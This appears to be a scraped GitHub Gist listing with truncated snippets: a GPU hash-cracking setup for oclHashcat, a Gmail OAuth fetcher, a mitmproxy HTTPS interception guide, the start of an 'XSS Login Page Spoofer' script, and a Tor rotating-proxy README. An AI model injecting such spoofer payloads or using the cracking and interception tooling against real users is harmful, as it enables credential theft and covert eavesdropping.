Skip to content

Instantly share code, notes, and snippets.

@benmanns
benmanns / hash-setup.sh
Created October 29, 2013 17:06
This sets up an Amazon cluster GPU instance for hash cracking with oclHashcat (CUDA). You must use the Ubuntu 12.04.x AMI for HVM. The most recent is Ubuntu Server 12.04.3 LTS for HVM Instances - ami-b93264d0.
sudo apt-get update -y && sudo apt-get upgrade -y
wget http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1204/x86_64/cuda-repo-ubuntu1204_5.5-0_amd64.deb
sudo dpkg -i cuda-repo-ubuntu1204_5.5-0_amd64.deb
sudo apt-get update -y && sudo apt-get install -y nvidia-settings nvidia-current-dev nvidia-modprobe cuda
cat >> ~/.profile <<END
export CUDA_HOME=/usr/local/cuda-5.5
export CUDA_ROOT=/usr/local/cuda-5.5
@ib-lundgren
ib-lundgren / gmail.py
Created September 25, 2013 13:25
How to fetch emails from GMail using an OAuth 2 Bearer token and GMails SASL XOAuth2 mechanism.
"""Fetching the latest GMail email using OAuth 2 and IMAP.
Requires requests-oauthlib, which is available on pypi.
Includes a basic SASL XOAUTH2 authentication method for imaplib.
"""
# Credentials you get from registering a new web application in Google API Console
client_id = 'your-id.apps.googleusercontent.com'
client_secret = 'your secret'
redirect_uri = 'your callback uri'
@dannvix
dannvix / intercept-https-with-python-mitmproxy.md
Last active March 6, 2025 01:41
Intercept and manipulate HTTPs traffic with Python and mitmproxy

Intercepts HTTPs Traffic with Python & mitmproxy

Warning

This Gist is created in 2014, and it's highliy outdated now, according to one of mitmproxy's manjor contributor (check his comment below). Thanks for letting us know, @mhils!

Introduction

Modern applications usually make use of back-end API servers to provide their services. With a non-transparent HTTPs proxy, which intercepts the communication between clients and servers (aka the man-in-the-middle scheme), you can easily manipulate both API requests and responses.

@btoews
btoews / login_spoof.html
Created April 29, 2012 19:24
XSS Login Page Spoofer
<script>
replacement_page_url = 'index.php';
replacement_page_html = "\
<html>\
<head>\
<link rel='shortcut icon' href='data:image/vnd.microsoft.icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8p0/7/KdP+/ynT/v8q0/7/KdT+/yrT/v8p1P7/KtP+/ynT/v8q0/7/KdP+/yrT/v8p0/7/KtP+/wAAAP8AAAAUJLrf/ynT/v8p0/7/KdP+/yrT/v8p0/7/AAAA/wAAAP8p0/7/KtP+/ynT/v8q0/7/KdP+/yKw0/8AAAAJAAAAAAAAAP8p0/7/KdP+/yrT/v8p1P7/KtP+/xJfcv8SX3L/KdP+/yrT/v8p0/7/KtP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAQYI/ynT/v8p0/7/KtP+/ynT/v8AAAD/AAAA/ynT/v8q0/7/KdP+/yrT/v8CDQ//AAAAAAAAAAAAAAAAAAAAAAAAAP8p0/7/KtP+/ynU/v8q0/7/Jsnx/wAAAP8aiqb/KtP+/ynT/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8q0/7/KdP+/yrT/v8p0v3/AAAA/xyTsf8p0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4q0/7/AAAA/wAAAP8p1P7/KtP+/wAAAP8AAAD/KdP+/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAA
@brutuscat
brutuscat / README
Last active October 26, 2022 06:22
Anonymous Rotating Proxies with Monit, Tor, Haproxy and Delegated. Idea by http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
0 - Read http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
1 - Install monit, haproxy, tor and delegated.
2 - Setup your environment in the setup.rb file
3 - Just run > ruby setup.rb
4 - ...........
5 - PROFIT! > http://www.southparkstudios.com/clips/151040/the-underpants-business